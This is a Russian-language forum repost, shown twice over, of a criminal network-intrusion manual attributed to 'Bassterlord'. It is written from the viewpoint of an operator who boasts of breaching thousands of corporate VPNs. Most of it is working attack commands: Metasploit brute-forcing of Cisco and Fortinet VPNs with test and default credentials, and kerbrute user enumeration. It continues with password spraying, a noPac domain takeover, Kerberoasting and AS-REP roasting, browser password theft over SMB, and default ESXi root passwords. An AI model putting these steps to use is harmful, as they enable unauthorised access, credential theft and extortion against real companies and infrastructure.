Всем привет =D этот мануал обрезан Bassterlord'ом!
Возьмите себе чаёк и начинайте читать годноту =))
Добавлю от себя: я зашел на этот форум из-за басстерлорда, увидел на соседнем форуме про него статью месяц назад и стало очень интересно про этот движ )) возможно кто-то из-за этой статьи захочет стать хацкером
Страница 1:
Этого вам никто не расскажет!
Мануал по работе с сетями v2.0
Внимание!
Материал содержит убойный контент!
Все совпадения с реальными компаниями – просто совпадения!
Страница 2:
Добыча мата
Страница 3:
Ну здорова давно не слышалисьне виделись =)
Итак, начнем.
Первое что нам понадобится это арендованный сервер чембыстрее, тем лучше.
Для удобства работы желательно установить на серв внц или рдпклиент думаю, как это делать нагуглите сами в крайнем случаеспросите у сапорта он вам все установит.
(в кали все установлено по умолчанию)
Страница 4:
Немножечко предыстории
Я со своей командой как обычно отрабатывал таргеты.
Ничего не предвещало беды, но вдруг ко мне в токс залетает “Сотрудник X” и задвигает тему нашел мол фортик.
Контора жир просто мега жир главное проглотить и не подавится.
Смотрю я на это чудо чудное и не могу поверить своим глазам.
Revenue: 25 000 000 000$
И вдруг мой глаз цепляется за креды от впна компании……
Login: wzv
Password: 12345678
Серьезно бл#ть?
Передаю приветы ************
Спасибо за бабки =)
Сначала подумал с логистикой проблемы и хотел вломить пиздян Сотруднику X
Ну как? КАК ТАКОЕ МОЖЕТ БЫТЬ ЧТОБ ТЕБЯ ЗАБЫТЬ И НЕ МОГУУУУУУУ!?
Ну в общем вы поняли, чем мы сегодня займемся?
Страница 5:
Брут корпоративных VPN
Страница 6:
Врываемся в наш арендованный сервер
Открываем консоль пишем
systemctl start postgresql
msfdb init
msfconsole
Жмем enter
Далее прописываем по списку
Для брута Cisco SSL VPN
use auxiliary/scanner/http/cisco_ssl_vpn
set USERNAME берем рандомное часто встречающееся имя пользователя
set PASSWORD указываем пароль
set PASS_FILE указываем файлик с дефолт паролями не более 3 штук
set PASS_FILE – только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров
set THREADS 10
set RHOSTS file: тут указываем файлик с ипами Cisco SSL VPN
пишем exploit тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds
Сканирование не начинается сразу, а только через 30-50 мин
Страница 7:
Итак, премию дебилам сисадминам и тестовые открытые учетныезаписи на ВПН =)
Только по test – test у меня насканило 400 доступов по другим меньше
Сам фортики пока не тестил но боюсь представить сколько выхлопа
будет. auxiliary/scanner/http/fortinet_ssl_vpn
модуль для форти
Думаю, там сами разберетесь принцип тотже
Итак, что мы имеем
Благодаря тупости сисадминов и оставленным дефолтным паролям, итестовым учетным записям после чека всего материала статистикавыглядит следующим образом:
Страница 8:
Всего айпи в скане 300 000
Открытые миллиардники USA
15 шт
Конторы от 50кк до 700кк
230 шт
Конторы с меньшей ревой либо не интересные госы итд
155
Ах ну******************************************************************************************
Конторка : ************
Логин test
Пароль test
Таким образом вы можете банально брутить впны и чем больше у васчасто встречающихся имен пользователей есть, тем больше вы откроете.
Страница 9:
МММ аху№нна
Остальные даже не стану перечислять
Как итог мы выяснили что у конторы с суперахуенной защитоймогут быть банально не отключены тестовые учетки на ВПН.
Что вас сильно удивит конторы никем не тронуты, то есть вызалетаете почти всегда в нетронутый материал.
Страница 10:
************************************************************************ - + *****
Чтобы прогнать все это дело по дефолт паролям и по 1 штуке, а иначе просто мощностей у вас не хватит у вас уйдет несколько лет жизни и работы.
Я ******** что в случае накрыва *************************************** открытый доступ, как и базы данных этой ***********.
А *******************************************************************************************.******************************
Страница 11:
Открыть
не
открываемое
Страница 12:
Многим из вас знакома ситуация, когда вы просканировали всеуязвимости, но поэксплуатировать их вам не удалось?
Итак, сканим сетку на наличие 88 порта.
Как мы видим, на 88 почти всегда торчит DC
Копируем айпи этих DC В отдельный текстовик
C:\Users\user\Desktop\123.txt
Открываем NMAP
И делаем
nmap -p 3389,445 -v -iL "C:\\Users\\user\\Desktop\\123.txt" -script rdpntlm-info,smb-enum-users,smb-os-discovery
В выдаче если повезет мы получим список учетных записейсразу. Если не прокатывает:
Выписываем себе вот эту строку DNS_Domain_Name:
Там может быть любое значение
Далее в прикрепленном архиве я дам вам софтину Kerbrute.exe
Страница 13:
Используем ее следующим образом
:C:\kerbrute.exe userenum C:\userlist.txt --dc 10.20.10.6 -d rushenterprises.com
Тычем enter и ждем пока переберутся все предполагаемыеучетки на домене.
После этих манипуляций копируем все что нашел кербрут к себев отдельный текстовик и чистим все оставляя только логины безприписки @домен
Идем в кали линукс
Открываем консоль
Пишем туды sudo legion
Ставим все как у меня предварительно указав файлик с логинами,который нашел кербрут и айпи DC.
Пароли по дефолту составьте свой список из 200 самых частыхпаролей.
Теперь остается ждать результатов, которые в логе выглядитпримерно вот так:
LDAP: engineering.calendarassword
Таким образом мы получаем валидную юзерку либо сразуадминку для домена, который мы не пробили уязвимостями.
После этого можно просканировать домен заново с найденнымикредами и по сканеру узнать все учетные записи на домене ископировать их они понадобятся нам для следующих шагов.
Страница 14:
Если мы потеряли доступ к конторе либо корп закрыл намдоступ в впн снятые учетные записи можно использовать дляповторного перебора доступа к компании
В этом нам помогут “Всадники” =)
ZOOMEYE FOFA CENSYS SHODAN
Просто хреначим сайт конторы в поисковую строку этихпоисковиков и в итоге находим альтернативные доступы идругие впн той же самой конторы так как обычно у крупныхкорпов далеко не один филиал!
Страница 15:
NOPAC
GetUserSPNs
GetNPUsers
Страница 16:
Итак, первым делом
git clone https://github.com/Ridter/noPac
Далее подставляем наши полученные данные
И пробуем их на каждом айпи где присутствует наш 88 порт cdnoPac
python noPac.py rush-enterprises.com/engineering.calendar:
password -dc-ip 10.0.0.21 --impersonate Administrator -dump-use-ldap
Далее пойдет дамп кредов как в зерологоне
Что делать с ними дальше было показано в первой частиобъяснять не стану.
Если с noPac не повезло пробуем извлечь захешированныепароли из домена.
Переходим в импакет в кали
GetUserSPNs.py rush-enterprises.com/engineering.calendarassword -dc-ip 10.0.0.21 -request
По итогу нам должно выдать хеши которые брутятся черезхешкат.
Каждый раз тип хеша уникален поэтому расписывать невижу смысла смотрите помощь по хешкат.
Если не выходит тогда
GetNPUsers.py rush-enterprises.com/ -usersfile/
home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request
В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)
GetNPUsers.py rush-enterprises.com/ -usersfile
/home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request
В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)
Страница 17:
ESXI
На дурака
Страница 18:
Определенных действий по каждой компании не существует
нужно только реагировать на то, что видишь.
Шаблон для каждой конторы всегда разный!
Представим ситуацию
Вы открыли контору добыли креды от компов, но увы вы
сталкиваетесь допустим с одним из этих ав Cylance,
Sophos (который в версии с хитманом), Falcon, Sentinel.
Пытаться обойти эти ав сложновато, однако выход есть если
контора полностью стоит на ESXI, то глупый сисадмин мог
допустить несколько ошибок в формировании структуры сети.
Во-первых, нам нужен будет скан всей сети.
Выделяем абсолютно все айпи адреса в сканере и пихаем эти
адреса в текстовик скажем на рабочем столе.
Открываем nmap и делаем там:
nmap -p 443 -iL "C:\\Users\\user\\Desktop\\123.txt" --script vmwareversion
Соответственно указываем наш путь к листу айпи который создали
Запускаем скан по итогу скана получаем следующее.
Пример: Output|
vmware-version:|
Server version: VMware ESX 4.1.0|
Build: 348481|
Locale version: INTL 000|
OS type: vmnix-x86|
Product Line ID: esx
Я для себя отфильтровал все самое не нужное в итоге
получилось следующая картина:
Страница 19:
Nmap scan report for 192.168.174.43
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.40
Server version: VMware vCenter Server 5.5.0
Nmap scan report for 192.168.174.41
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.44
Server version: VMware ESXi 6.5.0
Nmap scan report for 192.168.174.42
Server version: VMware ESXi 5.5.0
Первым делом идем на vCenter
https://192.168.174.40
Если не пускает на айпи винцетра логинимся на любой комп внутри сетии пробуем с него.
Итак, перед нами заветная панель ввода логина и пароля.
Первое что нужно сделать это попробовать войти в нее с учетками доменадминов.
Если у вас есть пароль от учетной записи администратора пробуем его
К примеру, Administrator@vsphere.local пароль
Дальше стоит попробовать всех домен админов которых удалось найти
Если пароли не подходят есть один метод поиска машин, которыераскрывают эти креды.
Админы сети как-то же в них заходят, верно?
Страница 20:
Идем в наш сканер
Создаем настройку как показано на скрине
Ресканим сетку с домен админ правами.
По итогу получаем те компы где можно быстро нарыть инфу оструктуре сети и украсть пароли от ESXI
Страница 21:
Достаточно заглянуть в документы и рабочие столы залогиненыхпользователей.
Некоторые сисадмины не парятся и хранят все пароли сразу втекстовиках на своих рабочих столах или сохраняют в браузерах.
Я использую утилиту
Password-Recovery For Firefox
От нирсофта
В ней есть одна особенность если указать путь к профилюпользователя фаерфокс через смб он без проблем состилит унего пароли, даже не заходя на сам комп через рдп.
Страница 22:
Domain\karen.admin password
Если нам удалось состилить пароли от VC идем туды
Ну а дальше вводим все ESXI в домен и создаем там своего юзера
Ранее за меня подобную тему раскрыл пользователь:
Он довольно подробно описал как ресетать пароли от
ESXI если у нас есть доступ к VC поэтому не вижу смысла тутописывать более подробно.
Его тема для ознакомления
Есть уникальный метод кхм…….. “ЭкСпЛоеТ@”
По-другому не назовешь =D
ЭтоLogin: root
Passwords: abc.
1231qaz@WSX
P@ssw0rd Passw0rd
password
НУ ДАЛЬШЕ ВЫ ПОНЯЛИ =D
Причем последнее открывает половину ESXI 50 на 50
И никакой 0дей не нужен просто человеческая тупость инежелание вводить руками в консоли сложные пароли дляподключения к тому же ESXI по SSH
Страница 23:
Ну и напоследок немного статистики
Тестовыми учетками test test взломано:
4865 – Cisco SSL VPN
9870 – Fortinet VPN
Остальное отдаю вам на растерзание дальше по дефолтлогинам и паролям у всех одинаковые шансы.
Но ведь есть еще и другие типы впнов можете самизаказать кодера который напишет брут под это дело.
Страница 24:
ВНИМАНИЕ!
Сбрученные VPN могут отвечать за критически важнуюинфраструктуру многих стран!
Лично мной найдено * ********* предприятий в том числе и в ***!
Если не знаете лучше туда не лазить так как
колониал пайплайн #2 никому не нужен!
Я не являюсь политически мотивированым хакером а просто
показываю на сколько тупы бывают админы сетей даже в самых
крупных корпорациях по всему миру!
Конец!
Возьмите себе чаёк и начинайте читать годноту =))
Добавлю от себя: я зашел на этот форум из-за басстерлорда, увидел на соседнем форуме про него статью месяц назад и стало очень интересно про этот движ )) возможно кто-то из-за этой статьи захочет стать хацкером
Страница 1:
Этого вам никто не расскажет!
Мануал по работе с сетями v2.0
Внимание!
Материал содержит убойный контент!
Все совпадения с реальными компаниями – просто совпадения!
Страница 2:
Добыча мата
Страница 3:
Ну здорова давно не слышалисьне виделись =)
Итак, начнем.
Первое что нам понадобится это арендованный сервер чембыстрее, тем лучше.
Для удобства работы желательно установить на серв внц или рдпклиент думаю, как это делать нагуглите сами в крайнем случаеспросите у сапорта он вам все установит.
(в кали все установлено по умолчанию)
Страница 4:
Немножечко предыстории
Я со своей командой как обычно отрабатывал таргеты.
Ничего не предвещало беды, но вдруг ко мне в токс залетает “Сотрудник X” и задвигает тему нашел мол фортик.
Контора жир просто мега жир главное проглотить и не подавится.
Смотрю я на это чудо чудное и не могу поверить своим глазам.
Revenue: 25 000 000 000$
И вдруг мой глаз цепляется за креды от впна компании……
Login: wzv
Password: 12345678
Серьезно бл#ть?
Передаю приветы ************
Спасибо за бабки =)
Сначала подумал с логистикой проблемы и хотел вломить пиздян Сотруднику X
Ну как? КАК ТАКОЕ МОЖЕТ БЫТЬ ЧТОБ ТЕБЯ ЗАБЫТЬ И НЕ МОГУУУУУУУ!?
Ну в общем вы поняли, чем мы сегодня займемся?
Страница 5:
Брут корпоративных VPN
Страница 6:
Врываемся в наш арендованный сервер
Открываем консоль пишем
systemctl start postgresql
msfdb init
msfconsole
Жмем enter
Далее прописываем по списку
Для брута Cisco SSL VPN
use auxiliary/scanner/http/cisco_ssl_vpn
set USERNAME берем рандомное часто встречающееся имя пользователя
set PASSWORD указываем пароль
set PASS_FILE указываем файлик с дефолт паролями не более 3 штук
set PASS_FILE – только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров
set THREADS 10
set RHOSTS file: тут указываем файлик с ипами Cisco SSL VPN
пишем exploit тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds
Сканирование не начинается сразу, а только через 30-50 мин
Страница 7:
Итак, премию дебилам сисадминам и тестовые открытые учетныезаписи на ВПН =)
Только по test – test у меня насканило 400 доступов по другим меньше
Сам фортики пока не тестил но боюсь представить сколько выхлопа
будет. auxiliary/scanner/http/fortinet_ssl_vpn
модуль для форти
Думаю, там сами разберетесь принцип тотже
Итак, что мы имеем
Благодаря тупости сисадминов и оставленным дефолтным паролям, итестовым учетным записям после чека всего материала статистикавыглядит следующим образом:
Страница 8:
Всего айпи в скане 300 000
Открытые миллиардники USA
15 шт
Конторы от 50кк до 700кк
230 шт
Конторы с меньшей ревой либо не интересные госы итд
155
Ах ну******************************************************************************************
Конторка : ************
Логин test
Пароль test
Таким образом вы можете банально брутить впны и чем больше у васчасто встречающихся имен пользователей есть, тем больше вы откроете.
Страница 9:
МММ аху№нна
Остальные даже не стану перечислять
Как итог мы выяснили что у конторы с суперахуенной защитоймогут быть банально не отключены тестовые учетки на ВПН.
Что вас сильно удивит конторы никем не тронуты, то есть вызалетаете почти всегда в нетронутый материал.
Страница 10:
************************************************************************ - + *****
Чтобы прогнать все это дело по дефолт паролям и по 1 штуке, а иначе просто мощностей у вас не хватит у вас уйдет несколько лет жизни и работы.
Я ******** что в случае накрыва *************************************** открытый доступ, как и базы данных этой ***********.
А *******************************************************************************************.******************************
Страница 11:
Открыть
не
открываемое
Страница 12:
Многим из вас знакома ситуация, когда вы просканировали всеуязвимости, но поэксплуатировать их вам не удалось?
Итак, сканим сетку на наличие 88 порта.
Как мы видим, на 88 почти всегда торчит DC
Копируем айпи этих DC В отдельный текстовик
C:\Users\user\Desktop\123.txt
Открываем NMAP
И делаем
nmap -p 3389,445 -v -iL "C:\\Users\\user\\Desktop\\123.txt" -script rdpntlm-info,smb-enum-users,smb-os-discovery
В выдаче если повезет мы получим список учетных записейсразу. Если не прокатывает:
Выписываем себе вот эту строку DNS_Domain_Name:
Там может быть любое значение
Далее в прикрепленном архиве я дам вам софтину Kerbrute.exe
Страница 13:
Используем ее следующим образом
:C:\kerbrute.exe userenum C:\userlist.txt --dc 10.20.10.6 -d rushenterprises.com
Тычем enter и ждем пока переберутся все предполагаемыеучетки на домене.
После этих манипуляций копируем все что нашел кербрут к себев отдельный текстовик и чистим все оставляя только логины безприписки @домен
Идем в кали линукс
Открываем консоль
Пишем туды sudo legion
Ставим все как у меня предварительно указав файлик с логинами,который нашел кербрут и айпи DC.
Пароли по дефолту составьте свой список из 200 самых частыхпаролей.
Теперь остается ждать результатов, которые в логе выглядитпримерно вот так:
LDAP: engineering.calendarassword
Таким образом мы получаем валидную юзерку либо сразуадминку для домена, который мы не пробили уязвимостями.
После этого можно просканировать домен заново с найденнымикредами и по сканеру узнать все учетные записи на домене ископировать их они понадобятся нам для следующих шагов.
Страница 14:
Если мы потеряли доступ к конторе либо корп закрыл намдоступ в впн снятые учетные записи можно использовать дляповторного перебора доступа к компании
В этом нам помогут “Всадники” =)
ZOOMEYE FOFA CENSYS SHODAN
Просто хреначим сайт конторы в поисковую строку этихпоисковиков и в итоге находим альтернативные доступы идругие впн той же самой конторы так как обычно у крупныхкорпов далеко не один филиал!
Страница 15:
NOPAC
GetUserSPNs
GetNPUsers
Страница 16:
Итак, первым делом
git clone https://github.com/Ridter/noPac
Далее подставляем наши полученные данные
И пробуем их на каждом айпи где присутствует наш 88 порт cdnoPac
python noPac.py rush-enterprises.com/engineering.calendar:
password -dc-ip 10.0.0.21 --impersonate Administrator -dump-use-ldap
Далее пойдет дамп кредов как в зерологоне
Что делать с ними дальше было показано в первой частиобъяснять не стану.
Если с noPac не повезло пробуем извлечь захешированныепароли из домена.
Переходим в импакет в кали
GetUserSPNs.py rush-enterprises.com/engineering.calendarassword -dc-ip 10.0.0.21 -request
По итогу нам должно выдать хеши которые брутятся черезхешкат.
Каждый раз тип хеша уникален поэтому расписывать невижу смысла смотрите помощь по хешкат.
Если не выходит тогда
GetNPUsers.py rush-enterprises.com/ -usersfile/
home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request
В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)
GetNPUsers.py rush-enterprises.com/ -usersfile
/home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request
В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)
Страница 17:
ESXI
На дурака
Страница 18:
Определенных действий по каждой компании не существует
нужно только реагировать на то, что видишь.
Шаблон для каждой конторы всегда разный!
Представим ситуацию
Вы открыли контору добыли креды от компов, но увы вы
сталкиваетесь допустим с одним из этих ав Cylance,
Sophos (который в версии с хитманом), Falcon, Sentinel.
Пытаться обойти эти ав сложновато, однако выход есть если
контора полностью стоит на ESXI, то глупый сисадмин мог
допустить несколько ошибок в формировании структуры сети.
Во-первых, нам нужен будет скан всей сети.
Выделяем абсолютно все айпи адреса в сканере и пихаем эти
адреса в текстовик скажем на рабочем столе.
Открываем nmap и делаем там:
nmap -p 443 -iL "C:\\Users\\user\\Desktop\\123.txt" --script vmwareversion
Соответственно указываем наш путь к листу айпи который создали
Запускаем скан по итогу скана получаем следующее.
Пример: Output|
vmware-version:|
Server version: VMware ESX 4.1.0|
Build: 348481|
Locale version: INTL 000|
OS type: vmnix-x86|
Product Line ID: esx
Я для себя отфильтровал все самое не нужное в итоге
получилось следующая картина:
Страница 19:
Nmap scan report for 192.168.174.43
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.40
Server version: VMware vCenter Server 5.5.0
Nmap scan report for 192.168.174.41
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.44
Server version: VMware ESXi 6.5.0
Nmap scan report for 192.168.174.42
Server version: VMware ESXi 5.5.0
Первым делом идем на vCenter
https://192.168.174.40
Если не пускает на айпи винцетра логинимся на любой комп внутри сетии пробуем с него.
Итак, перед нами заветная панель ввода логина и пароля.
Первое что нужно сделать это попробовать войти в нее с учетками доменадминов.
Если у вас есть пароль от учетной записи администратора пробуем его
К примеру, Administrator@vsphere.local пароль
Дальше стоит попробовать всех домен админов которых удалось найти
Если пароли не подходят есть один метод поиска машин, которыераскрывают эти креды.
Админы сети как-то же в них заходят, верно?
Страница 20:
Идем в наш сканер
Создаем настройку как показано на скрине
Ресканим сетку с домен админ правами.
По итогу получаем те компы где можно быстро нарыть инфу оструктуре сети и украсть пароли от ESXI
Страница 21:
Достаточно заглянуть в документы и рабочие столы залогиненыхпользователей.
Некоторые сисадмины не парятся и хранят все пароли сразу втекстовиках на своих рабочих столах или сохраняют в браузерах.
Я использую утилиту
Password-Recovery For Firefox
От нирсофта
В ней есть одна особенность если указать путь к профилюпользователя фаерфокс через смб он без проблем состилит унего пароли, даже не заходя на сам комп через рдп.
Страница 22:
Domain\karen.admin password
Если нам удалось состилить пароли от VC идем туды
Ну а дальше вводим все ESXI в домен и создаем там своего юзера
Ранее за меня подобную тему раскрыл пользователь:
Он довольно подробно описал как ресетать пароли от
ESXI если у нас есть доступ к VC поэтому не вижу смысла тутописывать более подробно.
Его тема для ознакомления
Есть уникальный метод кхм…….. “ЭкСпЛоеТ@”
По-другому не назовешь =D
ЭтоLogin: root
Passwords: abc.
1231qaz@WSX
P@ssw0rd Passw0rd
password
НУ ДАЛЬШЕ ВЫ ПОНЯЛИ =D
Причем последнее открывает половину ESXI 50 на 50
И никакой 0дей не нужен просто человеческая тупость инежелание вводить руками в консоли сложные пароли дляподключения к тому же ESXI по SSH
Страница 23:
Ну и напоследок немного статистики
Тестовыми учетками test test взломано:
4865 – Cisco SSL VPN
9870 – Fortinet VPN
Остальное отдаю вам на растерзание дальше по дефолтлогинам и паролям у всех одинаковые шансы.
Но ведь есть еще и другие типы впнов можете самизаказать кодера который напишет брут под это дело.
Страница 24:
ВНИМАНИЕ!
Сбрученные VPN могут отвечать за критически важнуюинфраструктуру многих стран!
Лично мной найдено * ********* предприятий в том числе и в ***!
Если не знаете лучше туда не лазить так как
колониал пайплайн #2 никому не нужен!
Я не являюсь политически мотивированым хакером а просто
показываю на сколько тупы бывают админы сетей даже в самых
крупных корпорациях по всему миру!
Конец!